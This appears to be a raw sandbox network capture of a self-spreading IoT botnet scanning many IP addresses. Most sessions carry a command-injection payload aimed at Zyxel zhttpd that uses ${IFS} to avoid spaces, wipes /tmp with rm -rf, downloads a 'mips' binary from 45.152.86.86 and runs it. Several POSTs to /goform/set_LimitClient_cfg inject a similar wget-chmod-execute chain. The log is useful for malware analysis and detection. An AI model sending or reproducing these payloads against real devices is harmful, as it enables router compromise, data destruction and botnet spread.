                                        Mar 31, 2024 09:22:44.896856070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9321192.168.2.2349536105.221.162.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:45.904671907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9322192.168.2.2356880133.50.254.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:45.904879093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9323192.168.2.235824686.45.223.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:45.905042887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9324192.168.2.2333536155.16.211.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:45.905211926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9325192.168.2.2341110201.154.159.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:45.905885935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9326192.168.2.2337844137.66.35.1958080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:46.866843939 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9327192.168.2.2356474201.41.5.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:46.910389900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9328192.168.2.2354558211.76.169.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:46.910554886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9329192.168.2.23429369.37.110.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:46.910604000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9330192.168.2.2337680192.119.34.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:46.910661936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9331192.168.2.2345864167.215.99.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:46.910711050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9332192.168.2.234887476.170.114.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913662910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9333192.168.2.2346522192.99.161.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913717031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9334192.168.2.2333664156.127.7.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913758039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9335192.168.2.2335894152.16.99.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913801908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9336192.168.2.235100276.200.52.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913853884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9337192.168.2.2354674210.74.176.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913886070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9338192.168.2.234615496.178.35.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913940907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9339192.168.2.2352944106.186.63.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.913983107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9340192.168.2.2335638125.202.106.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.914046049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9341192.168.2.2349348207.209.117.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.914087057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9342192.168.2.2337374141.149.123.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.914148092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9343192.168.2.2344350184.144.168.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:47.914201975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9344192.168.2.2336996112.48.217.78080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.361325026 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:48.775881052 CEST245INHTTP/1.1 404 Not Found
                                        Content-Length: 0
                                        X-NWS-LOG-UUID: 10607836643525915385
                                        Connection: close
                                        Server: Lego Server
                                        Date: Sun, 31 Mar 2024 07:22:48 GMT
                                        X-Cache-Lookup: Return Directly
                                        X-ServerIp: 112.48.217.7
                                        Client-Ip: 102.165.48.43


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9345192.168.2.2351298104.21.49.1688080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.369165897 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:48.463361025 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:22:48 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9346192.168.2.233686687.216.244.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.919605017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9347192.168.2.2335156134.224.191.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.919646978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9348192.168.2.235441857.138.176.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.919830084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9349192.168.2.233972840.34.70.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.919867039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9350192.168.2.234792254.161.52.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.919918060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9351192.168.2.2345706213.118.42.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:48.920032024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9352192.168.2.2357154181.81.70.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.931976080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9353192.168.2.234983643.131.173.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932032108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9354192.168.2.234117854.192.87.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932063103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9355192.168.2.2345010130.8.143.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932102919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9356192.168.2.2356568203.195.56.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932182074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9357192.168.2.2353404147.228.197.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932229996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9358192.168.2.233514889.74.228.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932290077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9359192.168.2.2354866110.230.116.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932347059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9360192.168.2.2339888148.23.115.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932403088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9361192.168.2.235625098.113.141.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932485104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9362192.168.2.2332808221.15.53.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932521105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9363192.168.2.2350200134.83.60.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932596922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9364192.168.2.2338092206.50.32.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932653904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9365192.168.2.2360250210.249.93.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932698011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9366192.168.2.235748427.104.62.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932738066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9367192.168.2.2355758160.101.87.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932775021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9368192.168.2.2346442111.244.127.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932832956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9369192.168.2.2340816142.213.64.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932878971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9370192.168.2.2359322112.238.251.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932925940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9371192.168.2.234029824.202.149.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.932980061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9372192.168.2.233492490.15.224.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933034897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9373192.168.2.2344988202.160.251.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933085918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9374192.168.2.2334984141.15.132.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933187008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9375192.168.2.2335418155.119.75.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933229923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9376192.168.2.23531789.224.112.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933281898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9377192.168.2.236012853.60.93.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933353901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9378192.168.2.2340404222.27.152.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933382034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9379192.168.2.2334384188.239.250.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933449984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9380192.168.2.2355262220.249.46.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933504105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9381192.168.2.2352636191.19.159.40443
